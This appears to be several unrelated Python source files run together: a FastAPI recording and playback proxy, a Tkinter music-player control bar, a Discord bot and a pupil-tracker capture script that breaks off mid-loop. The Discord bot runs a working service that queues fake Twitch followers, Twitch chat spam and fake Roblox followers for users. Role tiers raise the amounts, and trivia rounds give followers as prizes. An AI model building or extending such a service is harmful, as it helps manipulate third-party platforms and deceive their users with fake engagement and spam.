    if content_type.startswith("image"):
        return StreamingResponse(
            BytesIO(result.content),
            media_type=content_type,
            headers=headers,
            status_code=result.status_code
        )
    # BUG FIX: any other content type (e.g. text/html) previously fell
    # through and returned None, which FastAPI rejects; forward the raw
    # body with its original media type instead.
    return Response(
        result.content,
        media_type=content_type,
        headers=headers,
        status_code=result.status_code
    )
@app.get("/{rest_of_path:path}")
async def on_get(request: Request, rest_of_path: str):
return await proxy_request(request, rest_of_path)
@app.post("/{rest_of_path:path}")
async def on_post(request: Request, rest_of_path: str):
split = rest_of_path.split("/")
if split[0] == "__playback-proxy":
if split[1] == "quit":
logger.info("Quitting proxy")
quit_proxy()
return Response("Shutting down proxy", media_type='text/plain')
elif split[1] == "record":
start(split[-1], "RECORD")
return Response(f"Re-starting proxy for {split[-1]} in RECORD mode", media_type='text/plain')
elif split[1] == "play":
start(split[-1], "PLAYBACK")
return Response(f"Re-starting proxy for {split[-1]} in PLAYBACK mode", media_type='text/plain')
return await proxy_request(request, rest_of_path)
@app.put("/{rest_of_path:path}")
async def on_put(request: Request, rest_of_path: str):
return await proxy_request(request, rest_of_path)
@app.delete("/{rest_of_path:path}")
async def on_delete(request: Request, rest_of_path: str):
return await proxy_request(request, rest_of_path)
# Shared state between the IN (client-facing) and OUT (upstream) sockets.
out_connected = False  # flipped to True by out_on_open
# Annotations only declare intent; both are assigned in MessagesEndpoint.on_connect.
inSocket: fWebSocket
outSocket: _websocket.WebSocketApp
out_socket_endpoint = f"{settings.socket_protocol}{settings.endpoint}{settings.socket_rop}"
def outConnected():
    """Predicate for waiting.wait(): has the OUT socket finished connecting?"""
    return out_connected
if settings.socket_rop is not None:
    logger.info(f"Setting up socket on {settings.socket_rop}")

    @app.websocket_route(f"/{settings.socket_rop}")
    class MessagesEndpoint(WebSocketEndpoint):
        """Bridges the client's websocket (IN) with the upstream one (OUT)."""

        async def on_connect(self, in_ws):
            # Accept the client connection, start the recorder/player for the
            # current mode, and in proxy mode dial the upstream socket on a
            # background thread, blocking until it is connected.
            global inSocket, outSocket
            inSocket = in_ws
            await in_ws.accept()
            logger.info(f"IN socket connected on {settings.socket_rop}")
            if is_record:
                # NOTE(review): this `global recorder` is redundant -- the
                # method only reads the global, never rebinds it.
                global recorder
                recorder.start()
            elif is_playback:
                player.start()
            if is_proxy:
                outSocket = _websocket.WebSocketApp(out_socket_endpoint,
                                                    on_message = out_on_message,
                                                    on_error = out_on_error,
                                                    on_close = out_on_close)
                outSocket.on_open = out_on_open
                t = threading.Thread(target=outSocketThread, args=(outSocket,))
                t.daemon = True
                t.start()
                # Block until out_on_open fires so no client message is
                # relayed before the upstream socket exists.
                wait(outConnected)

        async def on_receive(self, in_ws, data) -> None:
            # Client -> upstream relay.
            logger.info("Received from IN socket " + data.decode("utf-8"))
            if is_proxy:
                outSocket.send(data)

        async def on_disconnect(self, in_ws, close_code):
            logger.info(f"IN socket disconnected on {settings.socket_rop}")
def outSocketThread(ws: _websocket):
    """Thread body: run the OUT socket's event loop until the socket closes."""
    # on_open is already assigned by the caller; reassigning it here is
    # redundant but harmless.
    ws.on_open = out_on_open
    ws.run_forever()
def out_on_message(ws, message):
    """Relay a message from the upstream (OUT) socket to the client (IN)
    socket, recording it first when in RECORD mode.

    Runs on the websocket-client thread, so the async send is driven by a
    short-lived event loop.
    """
    logger.info(f"Received from OUT socket {message}")
    if is_record:
        # (dropped a redundant `global recorder` -- the global is only read)
        recorder.save_socket(message)
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    try:
        loop.run_until_complete(inSocket.send_bytes(message))
    finally:
        # BUG FIX: a new loop was created per message and never closed,
        # leaking resources over the lifetime of the connection.
        loop.close()
def out_on_error(ws, error):
    """websocket-client error callback for the OUT socket."""
    logger.error(f"Got error on OUT socket {error}")
def out_on_close(ws):
    """websocket-client close callback for the OUT socket."""
    logger.warning(f"OUT socket was closed")
def out_on_open(ws):
    """websocket-client open callback: unblocks wait(outConnected)."""
    logger.info(f"OUT socket connected to {out_socket_endpoint}")
    global out_connected
    out_connected = True
|
Controls.py | # This Program Is Created Only For Practise and Educational Purpose Only
# This Program Is Created By S.S.B
# This Program Is Completely Free And Open Source
__author__='''
S.S.B
surajsinghbisht054@gmail.com
https://bitforestinfo.blogspot.com
'''
#
#
##################################################
######## Please Don't Remove Author Name #########
############### Thanks ###########################
##################################################
#
#
# Here Importing Modules
from Configuration_base import *
try:
import Tkinter, ttk
except:
import tkinter as Tkinter
import tkinter.ttk as ttk
import player, ListPanel, DisplayPanel, os, threading, time
class Controls:
    """Playback control bar: play/pause/stop, track navigation and volume."""

    def __init__(self, root, playing, player, volume):
        # playing: Tk variable holding the current song path;
        # player: media-player facade; volume: Tk variable for player volume.
        self.playervolume = volume
        self.root = Tkinter.Frame(root)
        self.root.pack()
        self.status = Tkinter.IntVar()  # For Song Status
        self.playing = playing
        self.player = player
        self.var = Tkinter.IntVar()  # For Volume Bar
        self.var.set(1.0)
        self.songtime = Tkinter.IntVar()
        self.create_control_panel()
        #self.time_thread()
        #print self.player.playing

    def time_thread(self):
        """Start the background watcher that auto-advances to the next song."""
        # NOTE(review): the thread is non-daemon, so it would keep the process
        # alive after the UI closes -- confirm before enabling.
        threading.Thread(target=self.update_time_).start()
        return

    def update_time_(self):
        """Poll every 2 seconds; when playback stops, advance to the next track."""
        while True:
            time.sleep(2)
            if self.player.player.playing:
                pass
            else:
                try:
                    print('Playing Next Music')
                    self.Next()
                except Exception as e:
                    print('Playing Next Music- Error', e)

    def create_control_panel(self):
        """Build the button bar (transport controls) and the volume slider."""
        frame = Tkinter.LabelFrame(self.root)
        frame.pack(expand='yes', fill='x', side='top')
        add_fileicon = Tkinter.PhotoImage(file="../Icons/add_file.gif")
        add_directoryicon = Tkinter.PhotoImage(file="../Icons/add_directory.gif")
        exiticon = Tkinter.PhotoImage(file="../Icons/exit.gif")
        playicon = Tkinter.PhotoImage(file="../Icons/play.gif")
        pauseicon = Tkinter.PhotoImage(file="../Icons/pause.gif")
        stopicon = Tkinter.PhotoImage(file="../Icons/stop.gif")
        rewindicon = Tkinter.PhotoImage(file="../Icons/rewind.gif")
        fast_forwardicon = Tkinter.PhotoImage(file="../Icons/fast_forward.gif")
        previous_trackicon = Tkinter.PhotoImage(file="../Icons/previous_track.gif")
        next_trackicon = Tkinter.PhotoImage(file="../Icons/next_track.gif")
        self.muteicon = Tkinter.PhotoImage(file="../Icons/mute.gif")
        self.unmuteicon = Tkinter.PhotoImage(file="../Icons/unmute.gif")
        delete_selectedicon = Tkinter.PhotoImage(file="../Icons/delete_selected.gif")
        # IMPROVEMENT: bind methods directly instead of eval('self.xxx')
        # strings -- same buttons and commands, without eval.
        buttons = [
            (playicon, self.play),
            (pauseicon, self.pause),
            (stopicon, self.stop),
            (previous_trackicon, self.previous),
            (rewindicon, self.rewind),
            (fast_forwardicon, self.fast),
            (next_trackicon, self.Next),
        ]
        for icon, command in buttons:
            storeobj = ttk.Button(frame, image=icon, command=command)
            storeobj.pack(side='left')
            storeobj.image = icon  # keep a reference so Tk doesn't GC the image
        self.volume_label = Tkinter.Button(frame, image=self.unmuteicon)
        self.volume_label.image = self.unmuteicon
        volume = ttk.Scale(frame, from_=Volume_lowest_value, to=Volume_highest_value,
                           variable=self.var, command=self.update_volume)
        volume.pack(side='right', padx=10, )
        self.volume_label.pack(side='right')
        return

    def update_volume(self, event=None):
        """Sync the player volume with the slider and swap mute/unmute icon."""
        if Volume_lowest_value == self.var.get():
            self.volume_label.config(state='active')
            self.volume_label.config(image=self.muteicon)
            self.playervolume.set(0.0)
            self.volume_label.config(state='disabled')
        else:
            self.volume_label.config(state='active')
            self.volume_label.config(image=self.unmuteicon)
            self.playervolume.set(self.volume_equalize())
            self.volume_label.config(state='disabled')
        return

    def volume_equalize(self):
        """Map the integer slider value onto a 0.0-1.0 float volume.

        One digit -> 0.d, two digits -> d.d; anything else passes through.
        """
        value = str(self.var.get())
        if len(value) == 1:
            val = '0.{}'.format(value)
        elif len(value) == 2:
            val = '{}.{}'.format(value[0], value[1])
        else:
            val = self.var.get()
        return float(val)

    def mute(self):
        """Drop the slider to zero and apply it."""
        self.var.set(0)
        return self.update_volume()

    def unmute(self):
        """Restore a default audible level and apply it."""
        self.var.set(11)
        return self.update_volume()

    def increase_volume(self):
        """Step the slider up by 5, clamped below the maximum."""
        high = Volume_highest_value - 5
        if self.var.get() < high:
            self.var.set(self.var.get() + 5)
        return self.update_volume()

    def decrease_volume(self):
        """Step the slider down by 5, clamped above the minimum."""
        low = 6
        if self.var.get() > low:
            self.var.set(self.var.get() - 5)
        return self.update_volume()

    def play(self):
        """Toggle between starting the selected song and resuming playback."""
        if self.status.get() == 0:
            k = self.player.play_song()
            self.status.set(1)
            return k
        elif self.status.get() == 1:
            k = self.player.play()
            self.status.set(0)
            return k
        else:
            print('something wrong on controls.Controls.play')
            print('or playing variable is empty')
            return 'Nothing'

    def pause(self):
        """Pause playback (valid in either status state)."""
        if self.status.get() == 0 or self.status.get() == 1:
            self.player.pause()
        return

    def stop(self):
        """Stop playback entirely."""
        self.player.stop()
        return

    def previous(self):
        """Select the previous file (listdir order) in the song's directory."""
        try:
            dirbase = os.path.dirname(self.playing.get())
            dirt = os.listdir(dirbase)
            base = os.path.basename(self.playing.get())
            k = dirt.index(base) - 1
            path = os.path.join(dirbase, dirt[k])
            print(path)
            self.playing.set(path)
        except Exception:
            # No current song / missing file: keep the current selection.
            # (Narrowed from a bare except so Ctrl-C isn't swallowed.)
            pass

    def fast(self):
        """Fast-forward within the current song."""
        return self.player.fast_forward()

    def Next(self):
        """Select the next file (listdir order) in the song's directory."""
        try:
            dirbase = os.path.dirname(self.playing.get())
            dirt = os.listdir(dirbase)
            base = os.path.basename(self.playing.get())
            # BUG FIX: was `index(base) - 1`, an exact copy of previous();
            # advancing means index + 1. At the last track the IndexError is
            # swallowed below, leaving the selection unchanged.
            k = dirt.index(base) + 1
            path = os.path.join(dirbase, dirt[k])
            print(path)
            self.playing.set(path)
        except Exception:
            pass

    def rewind(self):
        """Rewind within the current song."""
        return self.player.rewind()
class Main:
    """Top-level assembly: wires the media player, display panel, control bar
    and playlist panel together around shared Tk variables."""
    def __init__(self, root=None):
        self.root = Tkinter.Frame(root)
        self.root.pack(side='top')
        self.path = Tkinter.StringVar()  # For Song Path
        self.song_time = Tkinter.StringVar()  # For Song Playing Time
        self.song_duration = Tkinter.StringVar()  # For Song Duration
        self.volume = Tkinter.IntVar()  # For Song Volume
        # ============= Creating Media Player ======================================================
        mediaplayer = player.mediaplayer(self.path, self.song_time, self.song_duration, self.volume)
        # ============= Creating Display Panel ======================================================
        DisplayPanel.Player(self.root, self.path, self.song_time, self.song_duration)
        # ============= Creating Control Panel ======================================================
        lit2 = Controls(self.root, self.path, mediaplayer, self.volume)
        self.hook2 = lit2
        # ============= Here Connecting List Panel ======================================================
        lit = ListPanel.main(self.root, self.path)
        self.hook = lit.hook
# Script entry point: build the Tk root window and start the event loop.
if __name__=='__main__':
    root=Tkinter.Tk()
    Main(root)
    root.mainloop()
|
main.py | from difflib import SequenceMatcher
from discord.ext import commands
from lxml import html
import subprocess
import threading
import discord
import asyncio
import aiohttp
import random
import ctypes
import re
import os
import keep_alive
# SECURITY: the bot token used to be hard-coded on this line. A token committed
# to source control must be treated as leaked -- revoke it and supply a fresh
# one via the DISCORD_TOKEN environment variable instead.
token = os.environ.get('DISCORD_TOKEN', '')
prefix = '/'
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, case_insensitive=True, intents=intents)
bot.remove_command('help')  # replaced by the custom /help command below
administrators = [499218322261540865]  # Discord user ids allowed to run admin-only commands
chat_channel = 835851484281176077  # channel id where trivia answers are accepted
bots_channel = 835851858903695370  # channel id where bot commands are allowed
queue = []  # pending worker tasks, each encoded as 'task-arg1-arg2' (consumed by zoom())
def zoom():
    """Background worker: pops 'task-arg1-arg2' entries off the queue and runs them.

    Fixes a busy-wait bug: the original wrapped `queue.pop(0)` in a bare
    `except: pass`, so an empty queue made this thread spin at 100% CPU.
    """
    import time  # local import: the module's import block is outside this edit
    while True:
        try:
            entry = queue.pop(0)
        except IndexError:
            # Queue empty -- back off instead of busy-spinning.
            time.sleep(1)
            continue
        try:
            task, arg1, arg2 = entry.split('-')
            subprocess.run([task, arg1, arg2])
        except (ValueError, OSError):
            # Malformed entry or failed launch: drop it, matching the
            # original best-effort behaviour.
            pass
threading.Thread(target=zoom, daemon=True).start()
@bot.event
async def on_ready():
    """Log the connected guilds, then keep the presence line updated forever."""
    print(f'Servers: {len(bot.guilds)}')
    for g in bot.guilds:
        print(g.name)
    print()
    # bot.loop.create_task(status())
    while True:
        members = sum(g.member_count for g in bot.guilds)
        watching = discord.Activity(type=discord.ActivityType.watching,
                                    name=f'{members} users | ! twent v3')
        await bot.change_presence(activity=watching)
        await asyncio.sleep(60)
@bot.event
async def on_member_join(member):
    """Greet a newly joined member in the bots channel."""
    greeting = f'Welcome to **Twent**, {member.mention}.\nType `/help` to get started! Yey!'
    destination = await bot.fetch_channel(bots_channel)
    await destination.send(greeting)
@bot.event
async def on_command_error(ctx, error: Exception):
    """Global command error handler.

    In the bots channel, known error types get a user-facing embed;
    everywhere else the offending invocation is silently removed.
    """
    if ctx.channel.id != bots_channel:
        try:
            await ctx.message.delete()
        except:
            pass
        return
    if isinstance(error, commands.CommandOnCooldown):
        await ctx.send(embed=discord.Embed(color=16379747, description=f'{error}'))
    elif isinstance(error, commands.MissingRequiredArgument):
        await ctx.send(embed=discord.Embed(color=16379747, description='You are missing arguments required to run this command!'))
        # Don't charge the user a cooldown for a malformed invocation.
        ctx.command.reset_cooldown(ctx)
    elif 'You do not own this bot.' in str(error):
        await ctx.send(embed=discord.Embed(color=16379747, description='You do not have permission to run this command!'))
    else:
        print(str(error))
@bot.command()
async def help(ctx):
    """Send the command-overview embed (guild channels only)."""
    print(f'{ctx.author} | {ctx.author.id} -> /help')
    if ctx.channel.type == discord.ChannelType.private:
        return
    embed = discord.Embed(color=16777215)
    fields = (
        ('🎨 Help', '`/help`'),
        ('🎃 Tasks', '`/tasks`'),
        ('🎉 Twitch Followers', '`/tfollow (channel)`'),
        ('✨ Twitch Spam', '`/tspam (channel) (message)`'),
        ('🔮 Roblox Followers', '`/rfollow (user id)`'),
    )
    for name, value in fields:
        embed.add_field(name=name, value=value, inline=True)
    await ctx.send(embed=embed)
@bot.command()
async def ticket(ctx):
    """Open a private support-ticket channel for the caller.

    Fixes a matching bug: the original tested
    `f'ticket-{id}' in str(channels)`, a substring check that could match
    another user's ticket whose id merely starts with this user's id.
    """
    print(f'{ctx.author} | {ctx.author.id} -> /ticket')
    if ctx.channel.type != discord.ChannelType.private:
        channel_names = [str(x) for x in bot.get_all_channels()]
        if f'ticket-{ctx.author.id}' in channel_names:
            embed = discord.Embed(color=16379747, description='You already have a ticket open!')
            await ctx.send(embed=embed)
        else:
            ticket_channel = await ctx.guild.create_text_channel(f'ticket-{ctx.author.id}')
            # Hide the channel from @everyone, then grant the author access.
            await ticket_channel.set_permissions(ctx.guild.get_role(ctx.guild.id), send_messages=False, read_messages=False)
            await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
            embed = discord.Embed(color=16379747, description='Please enter the reason for this ticket, type `/close` if you want to close this ticket.')
            await ticket_channel.send(f'{ctx.author.mention}', embed=embed)
        # Remove the invocation from the public channel either way.
        await ctx.message.delete()
@bot.command()
async def close(ctx):
    """Delete a ticket channel: allowed for its owner, or any administrator."""
    print(f'{ctx.author} | {ctx.author.id} -> /close')
    if ctx.channel.type == discord.ChannelType.private:
        return
    is_owner = ctx.channel.name == f'ticket-{ctx.author.id}'
    is_admin = ctx.author.id in administrators and 'ticket' in ctx.channel.name
    if is_owner or is_admin:
        await ctx.channel.delete()
    else:
        embed = discord.Embed(color=16777215, description=f'You do not have permission to run this command!')
        await ctx.send(embed=embed)
@bot.command()
async def tasks(ctx):
    """Report the worker-queue length in the bots channel; elsewhere delete the invocation."""
    print(f'{ctx.author} | {ctx.author.id} -> /tasks')
    if ctx.channel.type == discord.ChannelType.private:
        return
    if ctx.channel.id != bots_channel:
        await ctx.message.delete()
        return
    embed = discord.Embed(color=16777215, description=f'`{len(queue)}` tasks in the queue!')
    await ctx.send(embed=embed)
tfollow_cooldown = []  # twitch channel names currently on the 5-minute per-channel cooldown
@bot.command()
@commands.cooldown(1, 100, type=commands.BucketType.user)
async def tfollow(ctx, channel, amount: int=None):
    """Queue a twitch-follower task for *channel*.

    The maximum amount is 50 plus bonuses from the caller's roles;
    `amount` is clamped to that maximum. Premium users jump to the front
    of the queue. NOTE(review): the per-channel cooldown is enforced by
    `await asyncio.sleep(300)` inside the handler, which keeps this
    coroutine alive for 5 minutes -- confirm that is intentional.
    """
    print(f'{ctx.author} | {ctx.author.id} -> /tfollow {channel}')
    if ctx.channel.type != discord.ChannelType.private:
        if ctx.channel.id == bots_channel or ctx.author.id in administrators:
            if str(channel.lower()) in tfollow_cooldown and ctx.author.id not in administrators:
                # Channel still cooling down: silently drop the request.
                try:
                    await ctx.message.delete()
                except:
                    pass
            else:
                try:
                    # '-' is the field separator of queued task strings, so it
                    # cannot appear in a channel name; bail out to the error path.
                    if '-' in str(channel):
                        raise Exception
                    max_amount = 0
                    if ctx.author.id in administrators:
                        tfollow.reset_cooldown(ctx)
                        max_amount += 1000
                    # Role-based bonus ladder.
                    premium = discord.utils.get(ctx.guild.roles, name='Premium')
                    if premium in ctx.author.roles:
                        max_amount += 1000
                    diamond = discord.utils.get(ctx.guild.roles, name='Diamond')
                    if diamond in ctx.author.roles:
                        max_amount += 750
                    gold = discord.utils.get(ctx.guild.roles, name='Gold')
                    if gold in ctx.author.roles:
                        max_amount += 450
                    silver = discord.utils.get(ctx.guild.roles, name='Silver')
                    if silver in ctx.author.roles:
                        max_amount += 250
                    bronze = discord.utils.get(ctx.guild.roles, name='Bronze')
                    if bronze in ctx.author.roles:
                        max_amount += 100
                    booster = discord.utils.get(ctx.guild.roles, name='#boost')
                    if booster in ctx.author.roles:
                        max_amount += 5000
                    _75 = discord.utils.get(ctx.guild.roles, name='Premium+')
                    if _75 in ctx.author.roles:
                        max_amount += 1000
                    _25 = discord.utils.get(ctx.guild.roles, name='+25')
                    if _25 in ctx.author.roles:
                        max_amount += 25
                    _10 = discord.utils.get(ctx.guild.roles, name='+10')
                    if _10 in ctx.author.roles:
                        max_amount += 10
                    _5 = discord.utils.get(ctx.guild.roles, name='+5')
                    if _5 in ctx.author.roles:
                        max_amount += 5
                    max_amount += 50  # base allowance for everyone
                    # Default to, and clamp at, the computed maximum.
                    if amount is None:
                        amount = max_amount
                    elif amount > max_amount:
                        amount = max_amount
                    if amount <= max_amount:
                        premium = discord.utils.get(ctx.guild.roles, name='Premium')
                        if premium in ctx.author.roles:
                            # Premium: task goes to the front of the queue.
                            position = len(queue) + 1
                            # embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`1/{position}`)')
                            embed = discord.Embed(color=16777215, description=f'Adding `{amount}` followers to `{channel}`! (`1/{position}`)')
                            await ctx.send(embed=embed)
                            queue.insert(0, f'tfollow-{channel}-{amount}')
                        else:
                            position = len(queue) + 1
                            # embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`{position}/{position}`)')
                            embed = discord.Embed(color=16379747, description=f'Adding `{amount}` followers to `{channel}`! (`1/{position}`)')
                            await ctx.send(embed=embed)
                            queue.append(f'tfollow-{channel}-{amount}')
                        if ctx.author.id not in administrators:
                            # Hold this channel on cooldown for 5 minutes.
                            tfollow_cooldown.append(str(channel.lower()))
                            await asyncio.sleep(300)
                            tfollow_cooldown.remove(str(channel.lower()))
                except:
                    embed = discord.Embed(color=16379747, description=f'Error, try again `{channel}`!')
                    await ctx.send(embed=embed)
                    tfollow.reset_cooldown(ctx)
        else:
            # Wrong channel and not an administrator: drop the invocation.
            await ctx.message.delete()
            tfollow.reset_cooldown(ctx)
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def tspam(ctx, channel, *, msg):
    """Queue a twitch-spam task (Premium role required, bots channel only).

    NOTE(review): the `amount = None; if amount is None:` dance always
    resolves to `amount = max_amount`, and the error path reports the task
    as "Added ... to queue!" even though it failed -- both look like
    leftovers worth confirming.
    """
    print(f'{ctx.author} | {ctx.author.id} -> /tspam {channel} {msg}')
    if ctx.channel.type != discord.ChannelType.private:
        premium = discord.utils.get(ctx.guild.roles, name='Premium')
        if premium in ctx.author.roles:
            if ctx.channel.id == bots_channel:
                try:
                    max_amount = 0
                    if ctx.author.id in administrators:
                        tspam.reset_cooldown(ctx)
                    max_amount += 25
                    amount = None
                    if amount is None:
                        amount = max_amount
                    if amount <= max_amount:
                        position = len(queue) + 1
                        embed = discord.Embed(color=16379747, description=f'Added `tspam-{channel}-{msg}` to queue!')
                        await ctx.send(embed=embed)
                        # tspam tasks always jump the queue.
                        queue.insert(0, f'tspam-{channel}-{msg}')
                except:
                    embed = discord.Embed(color=16379747, description=f'Added `tspam {channel} {msg}` to queue! ')
                    await ctx.send(embed=embed)
                    tspam.reset_cooldown(ctx)
            else:
                await ctx.message.delete()
                tspam.reset_cooldown(ctx)
        else:
            embed = discord.Embed(color=16379747, description='You do not have permission to run this command!')
            await ctx.send(embed=embed)
rfollow_cooldown = []  # roblox user ids currently on the 10-minute per-target cooldown
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def rfollow(ctx, user_id, amount: int=None):
    """Queue a roblox-follower task for numeric *user_id*.

    Mirrors tfollow(): amount is clamped to a role-derived maximum
    (admins +5000, base 25) and Premium users jump the queue.
    NOTE(review): as in tfollow, the cooldown's `await asyncio.sleep(600)`
    keeps this coroutine alive for 10 minutes.
    """
    print(f'{ctx.author} | {ctx.author.id} -> /rfollow {user_id}')
    if ctx.channel.type != discord.ChannelType.private:
        if ctx.channel.id == bots_channel or ctx.author.id in administrators:
            if str(user_id) in rfollow_cooldown and ctx.author.id not in administrators:
                # Target still cooling down: silently drop the request.
                try:
                    await ctx.message.delete()
                except:
                    pass
            else:
                try:
                    # Validate that user_id is numeric; failure goes to the error path.
                    int(user_id)
                    max_amount = 0
                    if ctx.author.id in administrators:
                        rfollow.reset_cooldown(ctx)
                        max_amount += 5000
                    max_amount += 25  # base allowance for everyone
                    if amount is None:
                        amount = max_amount
                    elif amount > max_amount:
                        amount = max_amount
                    if amount <= max_amount:
                        premium = discord.utils.get(ctx.guild.roles, name='Premium')
                        if premium in ctx.author.roles:
                            # Premium: task goes to the front of the queue.
                            position = len(queue) + 1
                            embed = discord.Embed(color=16777215, description=f'Adding `{amount}` followers to `{user_id}`! (`1/{position}`)')
                            await ctx.send(embed=embed)
                            queue.insert(0, f'rfollow-{user_id}-{amount}')
                        else:
                            position = len(queue) + 1
                            embed = discord.Embed(color=16777215, description=f'Adding `{amount}` followers to `{user_id}`! (`{position}/{position}`)')
                            await ctx.send(embed=embed)
                            queue.append(f'rfollow-{user_id}-{amount}')
                        if ctx.author.id not in administrators:
                            # Hold this target on cooldown for 10 minutes.
                            rfollow_cooldown.append(str(user_id))
                            await asyncio.sleep(600)
                            rfollow_cooldown.remove(str(user_id))
                except:
                    embed = discord.Embed(color=16379747, description='An error has occured while attempting to run this command!')
                    await ctx.send(embed=embed)
                    rfollow.reset_cooldown(ctx)
        else:
            await ctx.message.delete()
            rfollow.reset_cooldown(ctx)
@bot.command()
async def trivia(ctx):
    """Run an endless trivia loop (administrators only).

    Each round fetches a multiple-choice question from opentdb.com, waits
    20s for a correct answer in chat, then asks the winner for a twitch
    channel and queues a 50-follower reward.
    """
    print(f'{ctx.author} | {ctx.author.id} -> /trivia')
    if ctx.channel.type != discord.ChannelType.private:
        if ctx.author.id in administrators:
            await ctx.message.delete()
            async with aiohttp.ClientSession() as session:
                while True:
                    try:
                        # question, answer = random.choice(list(questions.items()))
                        # Fetch questions until one without 'which' is found
                        # (multiple-choice "which" questions are unanswerable
                        # without the option list).
                        while True:
                            async with session.get('https://opentdb.com/api.php?amount=1&type=multiple') as r:
                                r = await r.json()
                                question = html.fromstring(str(r['results'][0]['question'])).text_content()
                                answer = r['results'][0]['correct_answer']
                            if 'which' in question.lower():
                                pass
                            else:
                                break
                        embed = discord.Embed(color=16379747, description=f'**{question}**\n\nReward: **1080 twitch followers**')
                        await ctx.send(embed=embed)
                        def check(message: discord.Message):
                            # Predicate for bot.wait_for: exact (case-insensitive) match.
                            return str(message.content).lower() == str(answer).lower()
                            # NOTE(review): the line below is unreachable (it follows a
                            # return) -- it looks like an abandoned fuzzy-match version
                            # of this predicate. Confirm which behaviour was intended.
                            return SequenceMatcher(None, str(answer).lower(), str(message.content).lower()).ratio() > float(0.5) and message.channel.id == chat_channel
                        _answer = await bot.wait_for('message', check=check, timeout=20)
                        try:
                            embed = discord.Embed(color=16379747, description=f'{_answer.author.mention} has answered the question correctly!\n\nAnswer: **{answer}**')
                            await ctx.send(embed=embed)
                            embed = discord.Embed(color=16379747, description=f'{_answer.author.mention} send your twitch channel to claim the reward!')
                            await ctx.send(embed=embed)
                            def _check(message: discord.Message):
                                # Only the winner, in the chat channel, may claim.
                                return message.author.id == _answer.author.id and message.channel.id == chat_channel
                            _channel = await bot.wait_for('message', check=_check, timeout=20)
                            queue.append(f'tfollow-{_channel.content}-50')
                        except asyncio.TimeoutError:
                            # Winner never claimed -- move on.
                            pass
                    except asyncio.TimeoutError:
                        embed = discord.Embed(color=16379747, description=f'Nobody answered the question correctly.\n\nCorrect Answer: **{answer}**')
                        await ctx.send(embed=embed)
                    except:
                        # Network/parse failure: skip this round.
                        pass
                    await asyncio.sleep(5)
        else:
            await ctx.message.delete()
# Start the keep-alive web server (for hosted environments), then run the bot.
keep_alive.keep_alive()
bot.run(token)
|
capture_pupil.py | from pylsl import StreamInlet, resolve_byprop, local_clock, TimeoutError
import zmq
from zmq.utils.monitor import recv_monitor_message
import msgpack as serializer
import pupil.pupil_src.capture as pupil_capture
from multiprocessing import Process, Queue
import signal, sys, os, time, csv
import serial
import threading
# Guards concurrent access to PupilTracker.samples from the LSL and pupil threads.
samples_lock = threading.Lock()
# Identity of the PsychoPy marker stream this tracker synchronises against.
LSL_STREAM_NAME = 'psychopy'
LSL_STREAM_TYPE = 'marker'
# Module-level singleton created by load(); used by start()/stop().
pupil_tracker = None
class PupilTracker(object):
    """Records pupil-diameter samples (via a pupil-capture subprocess over ZMQ)
    interleaved with LSL stimulus markers, and exports them to CSV."""
    def __init__(self):
        # Launch pupil capture in a child process; it reports its ZMQ URL and
        # readiness back over this queue.
        pupil_queue = Queue()
        self.pupil_proc = Process(target=pupil_capture.alternate_launch,
                                  args=((pupil_queue), ))
        self.pupil_proc.start()
        while True:
            pupil_msg = pupil_queue.get()
            print(pupil_msg)
            if 'tcp' in pupil_msg:
                self.ipc_sub_url = pupil_msg
            if 'EYE_READY' in pupil_msg:
                break
        # Subscribe to the pupil process's IPC publisher; wait (via the
        # monitor socket) until the connection is actually established.
        context = zmq.Context()
        self.socket = zmq.Socket(context, zmq.SUB)
        monitor = self.socket.get_monitor_socket()
        self.socket.connect(self.ipc_sub_url)
        while True:
            status = recv_monitor_message(monitor)
            if status['event'] == zmq.EVENT_CONNECTED:
                break
            elif status['event'] == zmq.EVENT_CONNECT_DELAYED:
                pass
        print('Capturing from pupil on url %s.' % self.ipc_sub_url)
        self.socket.subscribe('pupil')
        # setup LSL
        streams = resolve_byprop('name', LSL_STREAM_NAME, timeout=2.5)
        try:
            self.inlet = StreamInlet(streams[0])
        except IndexError:
            raise ValueError('Make sure stream name="%s", is opened first.'
                             % LSL_STREAM_NAME)
        self.running = True  # cleared by export_data() to stop both threads
        self.samples = []    # (label, timestamp, payload) tuples, lock-protected
    # LSL and pupil samples are synchronized to local_clock(), which is the
    # runtime on this slave, not the host
    def _record_lsl(self):
        """Thread body: pull LSL marker samples and append them as 'STIM' rows."""
        while self.running:
            sample, timestamp = self.inlet.pull_sample(timeout=5)
            # time correction to sync to local_clock()
            try:
                if timestamp is not None and sample is not None:
                    timestamp = timestamp + self.inlet.time_correction(timeout=5)
                    samples_lock.acquire()
                    self.samples.append(('STIM', timestamp, sample))
                    samples_lock.release()
            except TimeoutError:
                pass
        print('closing lsl on the pupil side')
        self.inlet.close_stream()
    def _record_pupil(self):
        """Thread body: receive pupil messages and append diameter readings.

        NOTE(review): msgpack's `encoding=` argument was removed in msgpack
        1.0 -- this call pins the project to an older msgpack release.
        """
        while self.running:
            topic = self.socket.recv_string()
            payload = serializer.loads(self.socket.recv(), encoding='utf-8')
            samples_lock.acquire()
            self.samples.append(('pupil', local_clock(), payload['diameter']))
            samples_lock.release()
        print('Terminating pupil tracker recording.')
    def capture(self):
        """Start the pupil and LSL recording threads."""
        self.pupil_thread = threading.Thread(target=self._record_pupil)
        self.lsl_thread = threading.Thread(target=self._record_lsl)
        self.pupil_thread.start()
        self.lsl_thread.start()
    def export_data(self):
        """Stop recording and write all samples to the next free data/pupil CSV."""
        self.running = False
        self.pupil_thread.join(5)
        self.lsl_thread.join(5)
        print('Joined threads, now outputting pupil data.')
        # Pick the first unused data-%s.csv index.
        i = 0
        while os.path.exists("data/pupil/data-%s.csv" % i):
            i += 1
        # csv writer with stim_type, msg, and timestamp, then data
        with open('data/pupil/data-%s.csv' % i, 'w+') as f:
            writer = csv.writer(f)
            writer.writerow(('Signal Type', 'Msg', 'Time', 'Channel 1', 'Channel 2', 'Channel 3', 'Channel 4', 'Channel 5', 'Channel 6', 'Channel 7', 'Channel 8' ))
            for sample in self.samples:
